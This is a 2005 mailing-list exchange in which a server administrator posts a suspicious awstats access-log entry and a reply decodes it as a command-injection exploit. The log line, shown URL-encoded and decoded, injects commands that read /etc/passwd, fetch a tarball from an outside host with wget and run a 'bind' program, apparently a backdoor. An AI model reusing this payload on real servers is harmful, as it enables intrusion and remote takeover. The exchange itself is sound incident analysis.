Miles Beck wrote:

>I have awstats running on a server and saw this entry in my access.log. Can
>someone look at this and determine what the person was trying to do?
>
>I want to make sure they did nothing to the box.
>
>65.67.68.194 - - [17/Feb/2005:10:31:29 -0700] "GET
>/cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd
>%3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2
>ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf
>%20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp
>%3bcd%20%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar
>%20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d
>%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20
>texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 526347 "-" "-"
>
>-------------------------------------------------
>FastQ Communications 
>Providing Innovative Internet Solutions Since 1993
>
>---------------------------------------------------
>PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
>To subscribe, unsubscribe, or to change  you mail settings:
>http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>  
>

At first glance it looks like an exploit;
it's using the pipe to run commands:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cat /etc/passwd
;uname -a;id;echo Instalam Bind in /var/tmp;cd /var%2
ftmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf
 tw.tar.gz;cd tw;./bind;echo Instalam bind in /tmp
;cd /tmp;wget www.petry.se/public_html/tw.tar.gz;tar
 -xvzf tw.tar.gz;cd rw;./bind;echo


---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change  you mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss